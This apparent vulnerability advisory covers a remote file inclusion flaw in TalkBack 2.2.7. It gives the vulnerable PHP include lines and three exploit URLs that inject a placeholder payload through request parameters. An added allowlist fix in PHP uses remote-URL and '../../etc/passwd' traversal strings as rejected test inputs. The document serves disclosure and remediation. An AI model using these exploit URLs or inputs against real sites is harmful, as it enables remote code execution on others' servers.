TalkBack 2.2.7 - RFI


[o] TalkBack 2.2.7 Remote File Include Vulnerability
Software : TalkBack version 2.2.7
Vendor : http://www.scripts.oldguy.us/talkback
Author : NoGe


[o] Vulnerable file
comments-display-tpl.php
    include $language_file;
    include $config['comments_form_tpl'];
addons/separate-comments-mod/my-comments-display-tpl.php
    include $language_file;


[o] Exploit
http://localhost/path/comments-display-tpl.php?language_file=[evilcode]
http://localhost/path/comments-display-tpl.php?config[comments_form_tpl]=[evilcode]
http://localhost/path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=[evilcode]


[o] Publish
http://milw0rm.com/exploits/4640
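
The include statements listed under "Vulnerable file" take their path from a variable that the request can set. The PHP below is an added example, not TalkBack's code and not part of the original advisory: it resolves a language name against an allowlist before anything is included. The function name resolve_include, the constant TALKBACK_ENTRY, the language names and the temporary directory are assumptions made for the illustration.

```php
<?php
// Added example (not TalkBack code): resolve a language name to a file
// through an allowlist instead of passing request data to include.
// Assumption: the entry script defines a constant such as TALKBACK_ENTRY,
// and each template starts with: if (!defined('TALKBACK_ENTRY')) { exit; }

function resolve_include(string $baseDir, array $allowed, string $name): ?string
{
    // Exact match only: URLs, "../" sequences and stream wrappers never match.
    if (!in_array($name, $allowed, true)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    // Defence in depth: the resolved path must still sit under the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo data: a temporary language directory with one file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tb_lang_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/english.php', "<?php \$lang = array('post' => 'Post comment');\n");

$allowed = array('english', 'german');   // hypothetical language list
$inputs  = array(
    'english',                              // allowed and present
    'german',                               // allowed but file missing
    'http://example.invalid/file.txt',      // remote URL
    '../../etc/passwd',                     // path traversal
);
foreach ($inputs as $input) {
    $file = resolve_include($dir, $allowed, $input);
    printf("%-34s => %s\n", $input, $file === null ? 'rejected' : $file);
    if ($file !== null) {
        include $file; // only an allowlisted, resolved path is ever included
    }
}

unlink($dir . '/english.php');
rmdir($dir);
```

Keeping allow_url_include = Off in php.ini (PHP 5.2 and later) blocks the remote-URL form independently of this check.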


Comments

labatterie said…
The preparing to do some research about that.